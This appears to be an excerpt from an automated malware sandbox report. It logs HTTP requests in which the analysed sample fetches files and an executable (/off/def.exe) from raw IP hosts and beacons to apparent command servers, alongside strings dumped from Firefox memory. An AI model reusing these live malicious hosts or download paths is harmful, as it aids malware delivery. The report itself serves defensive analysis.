Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2926644947.00000294AD16B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2921314720.00000294ACE4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2913315248.00000294ACA17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B43E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2928411061.00000294ADCF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADCC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: DevToolsStartup.jsm:handleDebuggerFlagdevtools/client/framework/devtools-browserresource://devtools/server/devtools-server.jsUnable to start devtools server on devtools/client/framework/devtools@mozilla.org/dom/slow-script-debug;1DevTools telemetry entry point failed: {9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Got invalid request to save JSON dataFailed to listen. Listener already attached.releaseDistinctSystemPrincipalLoaderNo callback set for this channel.resource://devtools/shared/security/socket.js@mozilla.org/network/protocol;1?name=filebrowser.urlbar.dnsResolveFullyQualifiedNamesdevtools.performance.popup.feature-flag^([a-z+.-]+:\/{0,3})*([^\/@]+@).+^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?Failed to execute WebChannel callback:browser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPdevtools.performance.recording.ui-base-urlget FIXUP_FLAGS_MAKE_ALTERNATE_URIget FIXUP_FLAG_FORCE_ALTERNATE_URIJSON Viewer's onSave failed in startPersistenceFailed to listen. Callback argument missing.@mozilla.org/network/protocol;1?name=default@mozilla.org/uriloader/handler-service;1WebChannel/this._originCheckCallbackbrowser.fixup.dns_first_for_single_words^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)devtools.debugger.remote-websocket@mozilla.org/uriloader/dbus-handler-app;1@mozilla.org/network/file-input-stream;1resource://gre/modules/JSONFile.sys.mjshttps://mail.inbox.lv/compose?to=%shttp://www.inbox.lv/rfc2368/?value=%s{33d75835-722f-42c0-89cc-44f328e56a86}@mozilla.org/uriloader/web-handler-app;1extractScheme/fixupChangedProtocol<_injectDefaultProtocolHandlersIfNeededhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/local-handler-app;1http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/DeferredTask.sys.mjshandlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjsresource://gre/modules/JSONFile.sys.mjsScheme should be either http or httpshttps://mail.yahoo.co.jp/compose/?To=%s_finalizeInternal/this._finalizePromise<resource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjsresource://gre/modules/FileUtils.sys.mjsCan't invoke URIFixup in the content process{c6cf88b7-452e-47eb-bdc9-86e3561648ef}https://poczta.interia.pl/mh/?mailto=%sextension/default-theme@mozilla.org/extendedData@mozilla.org/network/async-stream-copier;1gecko.handlerService.defaultHandlersVersionisDownloadsImprovementsAlreadyMigratedhttp://poczta.interia.pl/mh/?mailto=%sMust have a source and a callbackhttps://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%snewChannel requires a single object argumenthttps://mail.yahoo.co.jp/compose/?To=%sSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLhttps://mail.inbox.lv/compose?to=%sNon-zero amount of bytes must be specified@mozilla.org/scriptableinputstream;1@mozilla.org/network/simple-stream-listener;1@mozilla.org/intl/converter-input-stream;1https://poczta
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8644000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", 